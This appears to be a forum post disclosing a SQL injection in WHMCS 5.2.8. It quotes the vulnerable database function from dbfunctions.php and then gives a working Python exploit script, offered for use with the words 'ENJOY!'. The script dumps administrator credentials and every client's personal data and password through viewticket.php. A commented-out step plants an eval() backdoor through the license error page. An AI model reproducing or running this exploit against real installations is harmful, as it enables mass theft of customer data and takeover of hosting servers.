WHMCS 5.2.8 Vulnerability

Here We Go again Po0r WHMCS new version again got exploited! THIS TIME IT'S again the same mistake in /includes/dbfunctions.php WE Can manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' = '[SQLI]'); FROM THIS VULNERABILITY WE CAN EVEN change /configuration.php whatever we want (PHP code included) [php] $value) { $key = db_make_safe_field($origkey); if (is_array($value)) { if ($key == 'default') { $key = '`default`'; } if ($value['sqltype'] == 'LIKE') { $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\''; continue; } if ($value['sqltype'] == 'NEQ') { $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\''; continue; } if ($value['sqltype'] == '>') { $criteria[] = $key . '>' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == '<') { $criteria[] = $key . '<' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == '<=') { $criteria[] = $origkey . '<=' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == '>=') { $criteria[] = $origkey . '>=' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == 'TABLEJOIN') { $criteria[] = $key . '=' . db_escape_string($value['value']); continue; } if ($value['sqltype'] == 'IN') { $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')'; continue; } continue; } [...] ?>[/php] SO Re-edit Your Previous WHMCS.py exploit script and ENJOY! Exp: [php] #!/usr/bin/env python # 2013/10/18 - WHMCS <=5.2.8 SQL Injection # [url]http://localhost.re/p/whmcs-528-vulnerability[/url] url = 'http://client.target.com/' import urllib, re, sys from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" def exploit(sql): sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql print "Doing stuff: %s" % sqlUnion #you could exploit any file that does a select, I randomly chose viewticket.php r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read() return re.search(r'
(.*?)
', r, re.DOTALL).group(1).strip() #get admins print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') #get users count = int(exploit('(SELECT COUNT(id) FROM tblclients)')) print "User count %d" % count for i in range(count): print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i) #are you evil? yes, you are! #php = "1';eval($_REQUEST['lol_whmcs']);#" #r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()[/php]

发表评论